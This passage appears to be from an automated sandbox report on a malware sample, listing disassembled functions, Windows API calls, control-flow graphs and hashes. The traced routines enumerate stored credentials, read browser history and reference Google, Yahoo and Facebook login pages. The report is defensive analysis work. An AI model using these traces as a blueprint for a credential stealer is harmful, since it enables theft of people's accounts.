                                                                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                              • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                              • String ID: bhv
                                                                                                              • API String ID: 4234240956-2689659898
                                                                                                              • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                              • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                              • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                              • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                              Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                              • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                              • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                              • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                              • API String ID: 2941347001-70141382
                                                                                                              • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                              • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                              • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                                              • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                              Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040C298
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                              • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                              • wcschr.MSVCRT ref: 0040C324
                                                                                                              • wcschr.MSVCRT ref: 0040C344
                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                              • GetLastError.KERNEL32 ref: 0040C373
                                                                                                              • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                              • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                              • String ID: visited:
                                                                                                              • API String ID: 2470578098-1702587658
                                                                                                              • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                              • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                              • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                              • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                              Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1fa call 406e8f 726->729 733 40e270-40e27d call 406b53 729->733 734 40e1fc-40e219 call 40dd50 * 2 729->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                              • memset.MSVCRT ref: 0040E1BD
                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                              • free.MSVCRT ref: 0040E28B
                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                              • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                              • API String ID: 2804212203-2982631422
                                                                                                              • Opcode ID: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                              • Opcode Fuzzy Hash: 1336a280070a4f27ef0c8ccd157a42e88156c8d5617ab228165dee6bd52a4842
                                                                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                              Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                              • memset.MSVCRT ref: 0040BC75
                                                                                                              • memset.MSVCRT ref: 0040BC8C
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 115830560-3916222277
                                                                                                              • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                              • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                              Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 822 41837f-4183bf 823 4183c1-4183cc call 418197 822->823 824 4183dc-4183ec call 418160 822->824 829 4183d2-4183d8 823->829 830 418517-41851d 823->830 831 4183f6-41840b 824->831 832 4183ee-4183f1 824->832 829->824 833 418417-418423 831->833 834 41840d-418415 831->834 832->830 835 418427-418442 call 41739b 833->835 834->835 838 418444-41845d CreateFileW 835->838 839 41845f-418475 CreateFileA 835->839 840 418477-41847c 838->840 839->840 841 4184c2-4184c7 840->841 842 41847e-418495 GetLastError free 840->842 845 4184d5-418501 memset call 418758 841->845 846 4184c9-4184d3 841->846 843 4184b5-4184c0 call 444706 842->843 844 418497-4184b3 call 41837f 842->844 843->830 844->830 850 418506-418515 free 845->850 846->845 850->830
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                              • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                                                                              • free.MSVCRT ref: 0041848B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile$ErrorLastfree
                                                                                                              • String ID: |A
                                                                                                              • API String ID: 77810686-1717621600
                                                                                                              • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                              • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                              Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0041249C
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                              • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                              • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                              • wcscpy.MSVCRT ref: 004125A0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                              • String ID: r!A
                                                                                                              • API String ID: 2791114272-628097481
                                                                                                              • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                              • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                              • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                              • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                              Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                              • wcslen.MSVCRT ref: 0040C82C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                              • API String ID: 2936932814-4196376884
                                                                                                              • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                              • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                              Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040A824
                                                                                                              • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                              • wcscpy.MSVCRT ref: 0040A854
                                                                                                              • wcscat.MSVCRT ref: 0040A86A
                                                                                                              • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                              • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                              • String ID: C:\Windows\system32
                                                                                                              • API String ID: 669240632-2896066436
                                                                                                              • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                              • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                              Function 0040BDB0 Relevance: 12.2, APIs: 8, Instructions: 151COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                              • wcslen.MSVCRT ref: 0040BE06
                                                                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                              • memset.MSVCRT ref: 0040BE91
                                                                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                              • wcschr.MSVCRT ref: 0040BF24
                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 697348961-0
                                                                                                              • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                              • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                              Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00403CBF
                                                                                                              • memset.MSVCRT ref: 00403CD4
                                                                                                              • memset.MSVCRT ref: 00403CE9
                                                                                                              • memset.MSVCRT ref: 00403CFE
                                                                                                              • memset.MSVCRT ref: 00403D13
                                                                                                                • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                              • memset.MSVCRT ref: 00403DDA
                                                                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                                              • String ID: Waterfox$Waterfox\Profiles
                                                                                                              • API String ID: 4039892925-11920434
                                                                                                              • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
